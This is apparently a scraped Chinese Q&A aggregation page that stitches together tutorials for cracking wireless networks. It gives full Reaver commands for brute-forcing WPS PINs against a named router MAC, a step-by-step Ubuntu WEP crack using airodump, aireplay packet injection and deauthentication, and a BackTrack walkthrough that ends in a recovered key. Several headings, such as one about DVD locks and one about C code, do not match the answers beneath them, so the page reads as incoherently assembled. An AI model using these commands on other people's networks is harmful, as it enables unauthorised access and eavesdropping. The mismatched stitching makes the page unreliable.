b2c信息网

您现在的位置是:首页 > 明日新闻 > 正文

明日新闻

airodump源码(adaboost源码)

hacker2023-03-23 11:30:27明日新闻110
本文目录一览:1、airodump-ng和aircrack-ng的区别2、

本文目录一览:

airodump-ng和aircrack-ng的区别

在Mac下面使用Aircrack-ng要解决的两个问题:Aircrack-ng在Mac下如何安装。

使用airport而不是Aircrack-ng中的工具获取握手包。

1.Aircrack-ng在Mac下编译的问题。

直接使用make源码有问题,可以使用Macport进行安装。

Macport已经预置了Aircrack-ng,brew没有。

安装好Macport之后,命令行下:sudoportinstallaircrack-ng,Macport会自动下载编译和安装。

2.获取握手包的问题。

Mac下面使用Aircrack-ng包中的airmon-ng进行嗅探有问题,会提示wireless-tools找不到,因为Airmon-ng依赖于wireless-tools,而Linuxwireless-tools在Mac下的编译也有问题。

如果使用wireshark的Monmode也有问题,wireshark的监听模式认为Mac的网卡不支持监听模式。

其实Mac本身自带一个airport工具,可以很方便的扫描和在监听模式下进行监听:airport-s进行扫描,airporten1sniff1进行监听。

linux reaver怎么用

需要工具:reaver

原理:穷举PIN码以攻破无线路由器的安全防护

安装:

下载源码

从这个网址下载reaver源代码

wget

解压

tar-xzvf reaver-1.4.tar.gz

安装必要的软件依赖库和工具

在您编译reaver前需要先安装pcaplib等工具,后面还需要aircrack-ng

sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

编译和安装

配置和编译Reaver

cd reaver-1.4

cd src

./configure

make

下载aircrack-ng源代码并编译

从Ubuntu12.04版本开始aircrack-ng不再被包含在版本软件仓库中,不过我们可以从网上下载它的源代码进行编译安装。如果aircrack-ng已经存在,则不必安装。./configure

make

sudo install

解压 tar -xzvf reaver-1.4.tar.gz

安装必要的软件依赖库和工具

在您编译 reaver前需要先安装 pcaplib等工具,后面还需要 aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

编译和安装

配置和编译 Reaver

cd reaver-1.4 cd src ./configure make

安装 Reaver

sudo make install

方法:

1 输入:airmon-ng start wlan0 开启监听模式 (屏幕显示 加载8187L驱动成功–一次就加载成功啊!)

2 输入:wash -i mon0 -C 查看所有开启WPS的无线路由 长时间无反应按Ctrl+C,结束进程,这时记下你要PJ的目标路由MAC.

3 输入:airodump-ng mon0 网卡以混杂模式扫描所有频道—并显示所有AP的信息(包括 AP的信号强度,ESSID,MAC,频道,加密方式,等等…..),按Ctrl+C,结束扫描.

注:如果你已知对方无线路由信息 第2,第3步 可省略!

4 输入:reaver -i mon0 -b MAC -a -S -vv 开始穷举pin码

注:随时可以按CTRL+C退出保存进程,下次按下光标控制键“上”键然后回车,进程可继续。

实战我输入了reaver -i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0 ( 多加了 -d 0 加快速度 ),只见屏幕飞闪……爽啊!

reaver 参数详解

必须参数

-i, –interface=wlan Name of the monitor-mode interface to use

网卡的监视接口,通常是mon0

-b, –bssid=mac BSSID of the target AP

AP的MAC地址

Optional Arguments: 可选参数

-m, –mac=mac MAC of the host system

指定本机MAC地址

-e, –essid=ssid ESSID of the target AP

路由器的ESSID,一般不用指定

-c, –channel=channel Set the 802.11 channel for the interface (implies -f)

信号的频道,如果不指定会自动扫描

-o, –out-file=file Send output to a log file [stdout]

输出日志文件

-s, –session=file Restore a previous session file

恢复进度文件

-C, –exec=command Execute the supplied command upon successful pin recovery

pin成功后执行命令

-D, –daemonize Daemonize reaver

设置reaver成Daemon

-a, –auto Auto detect the best advanced options for the target AP

对目标AP自动检测高级参数

-f, –fixed Disable channel hopping

禁止频道跳转

-5, –5ghz Use 5GHz 802.11 channels

使用5G频道

-v, –verbose Display non-critical warnings (-vv for more)

显示不重要警告信息 -vv 可以显示更多

-q, –quiet Only display critical messages

只显示关键信息

-h, –help Show help

显示帮助

Advanced Options:高级选项

-p, –pin=wps pin Use the specified 4 or 8 digit WPS pin

使用指定的4位或者8位pin码

-d, –delay=seconds Set the delay between pin attempts [1]

pin间延时,默认1秒

-l, –lock-delay=seconds Set the time to wait if the AP locks WPS pin attempts [60]

AP锁定WPS后等待时间

-g, –max-attempts=num Quit after num pin attempts

最大pin次数

Reaver 参数

—天天

-x, –fail-wait=seconds Set the time to sleep after 10 unexpected failures [0]

10次意外失败后等待时间,默认0秒

-r, –recurring-delay=x:y Sleep for y seconds every x pin attempts

每x次pin后等待y秒

-t, –timeout=seconds Set the receive timeout period [5]

收包超时,默认5秒

-T, –m57-timeout=seconds Set the M5/M7 timeout period [0.20]

M5/M7超时,默认0.2秒

-A, –no-associate Do not associate with the AP (association must be done by another application)

不连入AP(连入过程必须有其他程序完成)

-N, –no-nacks Do not send NACK messages when out of order packets are received

不发送NACK信息(如果一直pin不动,可以尝试这个参数)

-S, –dh-small Use small DH keys to improve crack speed

使用小DH关键值提高速度(推荐使用)

-L, –ignore-locks Ignore locked state reported by the target AP

忽略目标AP报告的锁定状态

-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet

每当收到EAP失败包就终止WPS进程

-n, –nack Target AP always sends a NACK [Auto]

对目标AP总是发送NACK,默认自动

-w, –win7 Mimic a Windows 7 registrar [False]

模拟win7注册,默认关闭

Ps:影响到无线的因素很多,所以各参数之间的配合很重要,当然,最关键的还是取决于信号。

原理详细:

什么是PIN码?

印在无线路由器设备标签上的一组8位数字字符串,无线路由器管理界面中当然也会存在并可更改。

PIN码有什么用?

在无线网卡的配套管理软件(如TP-LINK的QSS软件)里输入无线路由器设备上的那8位数字字符串就可以成功登录该已被加密的无线路由器。

穷举PIN码是什么意思?

既然知道了无线路由器PIN值的范围(8位纯数字),且目前大部分设备的WPS是呈开启状态的,那么穷举PIN码以攻破无线路由器的安全防护这一暴力行为就有了*理论*可行性

跪求broadcom 43XX无线破解驱动!无线网络高人来

用Ubuntu破解WEP密钥

第一步,很显然,是安装Ubuntu。从CD启动,按指示操作,非常简单。要注意的是,接下来的每一步都要有序进行,否则就达不到预期目标。 下一步是安装其它程序。首先要保证你的本本可以联网。安装其它程序,需要打开一个终端窗口,并键入如下代码:

sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup

sudo gedit /etc/apt/sources.list

在编辑器中,用以下代码代替其它东西:

## Add comments (##) in front of any line to remove it from being checked. ## Use the following sources.list at your own risk.

deb dapper main restricted universe multiverse

deb-src dapper main restricted universe multiverse

## MAJOR BUG FIX UPDATES produced after the final release

deb dapper-updates main restricted universe multiverse

deb-src dapper-updates main restricted universe multiverse

## UBUNTU SECURITY UPDATES

deb dapper-security main restricted universe multiverse

deb-src dapper-security main restricted universe multiverse

## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)

deb dapper-backports main restricted universe multiverse

deb-src dapper-backports main restricted universe multiverse

## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)

deb dapper free non-free

deb-src dapper free non-free

保存文件、退出编辑器。敲入如下命令:

sudo apt-get update

现在我们可以安装后续将会用到的包了:

sudo apt-get install build-essential

sudo apt-get install aircrack

sudo apt-get install kismet

sudo apt-get install airsnort

sudo apt-get install linux-source

sudo apt-get install linux-headers

sudo apt-get install sharutils

接下来你应该更新整个系统,方法是,进入系统菜单——Administration——Update Manager。单击“Check”,开始安装更新。然后重启系统。完成后,为Madwifi驱动打补丁。

这个地方可能会有点复杂。我的无线网卡(Linksys WPC55AG)用的是Atheros驱动,我需要对之打补丁。如果你的驱动和我的不同,你需要研究一下是否需要为驱动打补丁,是否甚至可以和Aircrack套件协同工作。Aircrack-ng.org的论坛是一个用来测试的好地方,当然了,google search也是的。如果你的网卡也是Atheros的,我们称之为ath0,那么,在终端窗口敲入iwconfig,会出现一行字符,显示以太网控制器是Atheros Communications……

我们来打补丁。当发现硬盘旧的驱动时,会暂时让你的无线网卡无法工作。先进入/usr/src目录,下载新的驱动、删掉老驱动,然后安装新驱动,并打上补丁。你可以把以下代码拷贝粘贴到终端:

sudo -i cd /usr/src

wget

wget

ifconfig ath0 down

rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal

find /lib/modules -name ‘ath*’ -exec rm -v {} \;

find /lib/modules -name ‘wlan*’ -exec rm -v {} \;

tar zxvf madwifi-cvs-20051025.tar.gz

cd madwifi

patch -Np1 -i ../madwifi-cvs-20051025.patch

make make install

modprobe ath_pci

如果你用的是Atheros驱动,接下来我们旧需要配置kismet了。如果你用的是其它驱动,就必须看你所使用的语法。首先进入Kismet配置,然后改变源代码行。

sudo gedit /etc/kismet/kismet.conf

把以“source=”打头的代码行变为“source=madwifi_ag,ath0,madwifi”,重启计算机。重启后你将可以通过无线网卡访问英特网。

现在我们开始破解。打开一个终端窗口,进入监控模式,运行ksimet。

sudo airmon start ath0

sudo kismet

找到你想要破解的无线网络,需要注意其ESSID和通道,然后敲Ctrl-C退出。

接下来运行airodump。

sudo airodump ath0 filename channel# 1

文件名随你意,可以作为ivs文件存在你的home目录下,或者存在你运行命令的任何目录下。

从airodump中拷贝无线网络的bssid,具体做法是选中后敲Shift+Ctrl+C。打开一个新的终端窗口,以便我们可以运行aireplay,开始注入数据包,导致数据量上升。我们想要airodump中的数据栏显示在10万到40万之间。数据包越多,aircrack就可以越快地找到WEP密钥。如果WEP密钥是128位的,我们可能需要多达100万个数据包。

sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0

应该把网络和无线连接联系起来。如果总是超时,你需要离无线路由器更近,或通过“sudo iwconfig ath0 rate 1M”改变接口速率。

接下来我们想开始注入数据包。

sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0

起初只是读取数据包,并且报告0个ARP请求、发送0个数据包。只需要等一两分钟,就会开始大量发送数据包了。如果返回文本,并报告说已经被削弱了,那么敲Ctrl+C,重新运行命令。可以通过敲入下面这条命令来加速任何事情:

sudo aireplay -0 ath0 -a BSSID ath0

否则就只坐等事情慢慢进行吧。随着数据包开始被发送,Airodump中的数据栏就开始飙升。等到收到了预期数量的数据包,打开一个新的终端窗口,运行aircrack。

sudo aircrack filename.ivs

一分钟后,aircrack应该返回WEP密钥。如果没有返回,那就继续回收更多的数据包。

这做起来一点都不费劲,但可以起作用。

锁密码的dvd怎么破解?

1使用Linux。Windows无法嗅出WEP数据包,但你可以使用Linux的启动CD 。来自网页,仅供参考!

2获取一个数据包嗅探程序。BackTrack是一个常用的软件包。下载ISO映像,并刻录到启动CD / DVD 。

3启动Linux 和Backtrack。使用启动CD / DVD 。

注意,此操作系统是不需要安装在硬盘驱动器上。这意味着只要你关闭Backtrack,所有数据都将丢失。

4选择一个启动选项。开机后以下Backtrack屏幕会显示。用向上和向下箭头键更改选项,并选择一个。本教程将使用第一个选项。

5通过操作指令装载图形界面。在这个选项中,Backtrack由操作指令启动。键入:startx来继续。

6点击左下角的 “终端”按钮。这将是第五个选项。

7等待Linux命令终端打开。

8查看你的无线局域网类型。输入下面的命令:“ airmon-ng ”(不含引号)。你应该在界面下方看到类似WLAN0的字样。.

9获取所有接入点所需的信息。输入下面的命令: “airodump-ng wlan0”(不含引号) 。你应该得到三件事情:

BSSID

通道

ESSID (AP 名称)

下面是本教程的情况:

BSSID 00:17:3F:76:36:6E

1号通道

ESSID(AP 名称)Suleman

10输入下面命令。这一次将使用上面例子的信息,但你应该输入自己的。命令airodump-ng -w wep -c 1 -- bssid 00:17:3F:76:36:6E wlan0” (不带引号) 。

11允许设置开始。

12打开一个新的终端窗口。键入下面的命令,你自己的BSSID ,通道和ESSID值替代。命令: “aireplay-ng -1 0 –a 00:17:3f:76:36:6E wlan0” (不含引号) 。

13打开另一个新的终端窗口。键入以下命令:“aireplay-ng -3 –b 00:17:3f:76:36:6e wlan0”(不含引号) 。

14允许设置开始。

15回第一个终端窗口。

16让此窗口中的数据达到30000以上。根据接入点的无线信号,硬件和负载这将需要15至60分钟(或更多) 。

17转到第三终端窗口,然后按Ctrl + c 。

18拉出目录。键入以下命令:“ dir”命令(不含引号) 。这将显示在解密过程中保存的目录。

19使用.cap档案。这个例子中是以下内容“aircrack-ng web-02.cap”(不含引号)。如下图所示的设置将启动。

20破解WEP密码。这个设置完成后,就可以破解密码。在这个例子中,它是{ ADA2D18D2E } 。

提示

01有关网络安全的法律各地不同。确保你知道你需要知道的,并准备面对你的行动引起的一切后果。

02许多嗅探程序,诸如Wireshark(以前称为Ethereal ),AirSnort和Kismet,提供嗅探程序源代码。你需要有一些使用Linux或Windows源代码编译的背景知识来使用Airsnort或Kismet。 Wireshark(Ethereal )自带安装程序,或者你可以下载源代码。

03你可能找到大多数已编译的程序。

仅供参考!

C语言实现 获取linux系统正在连接的无线网络的 网络名,和加密方式

第一步: 下载 aircrack

最简单的方法就是找开Ubuntu 软件管理中心 , 在这里直查找 aircrack ,找到后直接下载安装就可以了,非常方便。

第二步:启动无线网卡的监控模式

sudo airmon-ng start wlan0 启动无线 网卡 的监控模式。

第三步:查找你周围的无线网络

sudo airodump-ng mon0

会出现你周围的无线网络列表

如果楼主有兴趣有毅力的话,可以把aircrack源代码读玩.

官方网站为

发表评论

评论列表

  • 孤央宠臣(2023-03-23 12:42:03)回复取消回复

    D和通道,然后敲Ctrl-C退出。 接下来运行airodump。sudo airodump ath0 filename channel# 1 文件名随你意,可以作为ivs

  • 冢渊不矜(2023-03-23 14:02:05)回复取消回复

    键然后回车,进程可继续。实战我输入了reaver -i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0 ( 多加了 -d 0 加快速度 ),只见屏幕飞闪……爽啊!reaver 参数详解必须参数-i